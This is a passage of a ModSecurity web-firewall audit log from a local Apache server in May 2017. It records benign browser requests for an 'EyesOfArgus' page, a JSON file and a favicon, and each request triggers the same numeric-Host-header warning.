\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc5J38AAQEAABzhe1QAAAAF\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":648,"p2":1100,"p3":69,"p4":401,"p5":120,"sr":41,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1UAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:39 GMT","ETag":"\"cca-54f6a9b9e1299-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc5J38AAQEAABzhe1UAAAAF\"]"],"stopwatch":{"p1":380,"p2":1066,"p3":62,"p4":369,"p5":58,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1YAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:41 GMT","ETag":"\"295-54f6a9bb5c11f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc5KH8AAQEAABzhe1YAAAAF\"]"],"stopwatch":{"p1":603,"p2":1594,"p3":83,"p4":211,"p5":91,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1cAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1cAAAAF\"]"],"stopwatch":{"p1":506,"p2":1134,"p3":55,"p4":246,"p5":53,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1gAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1gAAAAF\"]"],"stopwatch":{"p1":428,"p2":922,"p3":46,"p4":247,"p5":49,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoAAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:56:05 GMT","ETag":"\"ccc-54f6ab29ace5f-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc69X8AAQEAABwOGoAAAAAB\"]"],"stopwatch":{"p1":15638,"p2":3134,"p3":87,"p4":468,"p5":71,"sr":82,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoEAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoEAAAAB\"]"],"stopwatch":{"p1":416,"p2":874,"p3":47,"p4":248,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoIAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoIAAAAB\"]"],"stopwatch":{"p1":360,"p2":1789,"p3":69,"p4":450,"p5":49,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:49 --0400","transaction_id":"WRc7DX8AAQEAABwQSCIAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:56:05 GMT","If-None-Match":"\"ccc-54f6ab29ace5f-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:46 GMT","ETag":"\"ccc-54f6ab8a0710a-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7DX8AAQEAABwQSCIAAAAD\"]"],"stopwatch":{"p1":638,"p2":967,"p3":108,"p4":494,"p5":66,"sr":33,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCMAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:47 GMT","ETag":"\"295-54f6ab8b53192\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7Dn8AAQEAABwQSCMAAAAD\"]"],"stopwatch":{"p1":420,"p2":977,"p3":96,"p4":199,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
